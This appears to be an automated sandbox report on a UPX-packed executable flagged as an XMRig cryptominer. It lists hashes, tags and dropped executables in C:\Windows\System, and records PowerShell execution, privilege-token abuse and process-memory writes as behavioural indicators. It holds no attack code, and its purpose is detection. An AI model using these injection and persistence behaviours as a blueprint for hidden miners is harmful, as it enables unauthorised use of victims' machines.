Malware Analysis Report

2024-09-10 13:54

Sample ID 240613-q1dndsvhkj
Target 80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe
SHA256 3d8118401b5435446c1deafeff3802ef06ca5a4c26f812461b408f8712b85fac
Tags
upx miner xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3d8118401b5435446c1deafeff3802ef06ca5a4c26f812461b408f8712b85fac

Threat Level: Known bad

The file 80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

upx miner xmrig execution

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

UPX packed file

Drops file in Windows directory

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-13 13:43

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 13:43

Reported

2024-06-13 13:45

Platform

win7-20240419-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\YZCwoJA.exe N/A
N/A N/A C:\Windows\System\bNRpHVS.exe N/A
N/A N/A C:\Windows\System\LPrQCdv.exe N/A
N/A N/A C:\Windows\System\rxSqzQn.exe N/A
N/A N/A C:\Windows\System\bJUJtdQ.exe N/A
N/A N/A C:\Windows\System\oDTueRt.exe N/A
N/A N/A C:\Windows\System\QdOUEfh.exe N/A
N/A N/A C:\Windows\System\uKjlAqU.exe N/A
N/A N/A C:\Windows\System\hoJfAQC.exe N/A
N/A N/A C:\Windows\System\WwRuaRU.exe N/A
N/A N/A C:\Windows\System\FaxkFPF.exe N/A
N/A N/A C:\Windows\System\bpwZIed.exe N/A
N/A N/A C:\Windows\System\sjwyJAC.exe N/A
N/A N/A C:\Windows\System\WKLHFqB.exe N/A
N/A N/A C:\Windows\System\htbFqvr.exe N/A
N/A N/A C:\Windows\System\lXBNLdb.exe N/A
N/A N/A C:\Windows\System\UHnPMjp.exe N/A
N/A N/A C:\Windows\System\eyHfxQi.exe N/A
N/A N/A C:\Windows\System\zPDOXMq.exe N/A
N/A N/A C:\Windows\System\uOBfAzd.exe N/A
N/A N/A C:\Windows\System\DrRdccK.exe N/A
N/A N/A C:\Windows\System\jIUxMZJ.exe N/A
N/A N/A C:\Windows\System\NJEiDqJ.exe N/A
N/A N/A C:\Windows\System\HpKEuAW.exe N/A
N/A N/A C:\Windows\System\uVUfCjX.exe N/A
N/A N/A C:\Windows\System\pHVBVGJ.exe N/A
N/A N/A C:\Windows\System\jyBztnc.exe N/A
N/A N/A C:\Windows\System\XmWxnXo.exe N/A
N/A N/A C:\Windows\System\VTvselR.exe N/A
N/A N/A C:\Windows\System\AbaZMuB.exe N/A
N/A N/A C:\Windows\System\ffuapkA.exe N/A
N/A N/A C:\Windows\System\StCUCZJ.exe N/A
N/A N/A C:\Windows\System\tgkObNU.exe N/A
N/A N/A C:\Windows\System\MdZZFnB.exe N/A
N/A N/A C:\Windows\System\GwuuBsu.exe N/A
N/A N/A C:\Windows\System\vgwqJkd.exe N/A
N/A N/A C:\Windows\System\hFeJkhY.exe N/A
N/A N/A C:\Windows\System\aAztSQU.exe N/A
N/A N/A C:\Windows\System\TRUwWlv.exe N/A
N/A N/A C:\Windows\System\dFScXJH.exe N/A
N/A N/A C:\Windows\System\EwZDWsM.exe N/A
N/A N/A C:\Windows\System\fYIbOZg.exe N/A
N/A N/A C:\Windows\System\bDRnVLJ.exe N/A
N/A N/A C:\Windows\System\WqWFhaO.exe N/A
N/A N/A C:\Windows\System\AGSFtvO.exe N/A
N/A N/A C:\Windows\System\gAEtJWF.exe N/A
N/A N/A C:\Windows\System\YerCMVo.exe N/A
N/A N/A C:\Windows\System\HlykzoN.exe N/A
N/A N/A C:\Windows\System\DKJhBUZ.exe N/A
N/A N/A C:\Windows\System\PUvXbtE.exe N/A
N/A N/A C:\Windows\System\lXdOIDT.exe N/A
N/A N/A C:\Windows\System\ZbFbmTP.exe N/A
N/A N/A C:\Windows\System\kfrEWIp.exe N/A
N/A N/A C:\Windows\System\fbnakyI.exe N/A
N/A N/A C:\Windows\System\vRbSxIT.exe N/A
N/A N/A C:\Windows\System\vCVIfpr.exe N/A
N/A N/A C:\Windows\System\TGKQloq.exe N/A
N/A N/A C:\Windows\System\vOITpmW.exe N/A
N/A N/A C:\Windows\System\KGFRsIu.exe N/A
N/A N/A C:\Windows\System\UQcLYiT.exe N/A
N/A N/A C:\Windows\System\tkOkQno.exe N/A
N/A N/A C:\Windows\System\SuJfizp.exe N/A
N/A N/A C:\Windows\System\HMbzJNr.exe N/A
N/A N/A C:\Windows\System\SvoBAqr.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\UpaLqAp.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EOkMBVm.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\urMmszK.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\JALLniD.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TBpHoQT.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\juKCrtH.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\deuytCI.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HHOfLbX.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KwSjgLH.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aVhrefa.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cmtOIlV.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\msnvMcd.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ItvEhIo.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DXJQYKZ.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dKjtOec.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AOqqnhh.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HlfBdSK.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EVRZdDW.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\trOQkPF.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KyWRaGE.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tCqJqNE.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\oBQlMTi.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LFhHQuR.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DGKFZoY.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PvIDPeZ.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\dwDtSPz.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XAEKQTl.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wInIPfj.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qfkrPDO.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OASpcek.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\VZGqzeB.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fhvMuet.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fxGAcff.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IaOHIDp.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\gkwcoHG.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\omNnxUv.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AZvTwoS.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KAxnUjr.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tWaNGFW.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\txGNVKA.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\iMepjpT.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GmtjuVo.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GEnkkSR.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zLIRLqa.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pMWmhFp.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HACsknI.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PcSTXxF.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rGmhfOf.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ibdddDq.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wKefsLO.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LAKtkVi.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OphcfoX.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZpRHFGW.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IBceEHP.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wNAlMgc.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vQRMFlr.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mbTtjVE.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ouNqTlj.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WkHKnGx.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\NQCMqNg.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UTbSOAq.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CqegHwp.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RKCoykX.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QyVNoNy.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3020 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3020 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3020 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\YZCwoJA.exe
PID 3020 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\YZCwoJA.exe
PID 3020 wrote to memory of 2244 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\YZCwoJA.exe
PID 3020 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bNRpHVS.exe
PID 3020 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bNRpHVS.exe
PID 3020 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\bNRpHVS.exe
PID 3020 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\LPrQCdv.exe
PID 3020 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\LPrQCdv.exe
PID 3020 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\LPrQCdv.exe
PID 3020 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\oDTueRt.exe
PID 3020 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\oDTueRt.exe
PID 3020 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\oDTueRt.exe
PID 3020 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\rxSqzQn.exe
PID 3020 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\rxSqzQn.exe
PID 3020 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\rxSqzQn.exe
